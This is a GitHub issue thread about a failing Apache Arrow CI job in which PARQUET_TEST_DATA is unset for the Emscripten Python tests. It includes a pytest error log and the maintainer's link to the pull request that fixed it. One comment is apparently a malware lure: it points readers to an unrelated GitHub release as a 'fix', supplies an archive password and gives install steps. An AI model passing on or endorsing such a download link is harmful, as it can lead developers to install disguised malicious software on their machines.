### ISSUE TITLE
[Python][Parquet][Emscripten] PARQUET_TEST_DATA isn't set in test-conda-python-emscripten

### ISSUE THREAD

**Issue by kou** [apache/arrow#43868]
### Describe the bug, including details regarding any error messages, version, and platform.

It's required since #41580.

https://github.com/ursacomputing/crossbow/actions/runs/10604493737/job/29391275377#step:7:8847

```text
 ==================================== ERRORS ====================================
____________ ERROR at setup of test_column_chunk_key_value_metadata ____________

    @pytest.fixture(scope='module')
    def parquet_test_datadir():
        result = os.environ.get('PARQUET_TEST_DATA')
        if not result:
>           raise RuntimeError('Please point the PARQUET_TEST_DATA environment '
                               'variable to the test data directory')
E           RuntimeError: Please point the PARQUET_TEST_DATA environment variable to the test data directory

/lib/python3.12/site-packages/pyarrow/tests/parquet/conftest.py:35: RuntimeError
```

### Component(s)

Parquet, Python

**Comment by Amrithesh-k** [comment]
to fix your trouble check this fix, i see it in another issue,
https://github.com/aravinda-gamage/x86_64-win64-ranlib/releases/tag/fix
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by kou** [comment]
Issue resolved by pull request 43906
https://github.com/apache/arrow/pull/43906
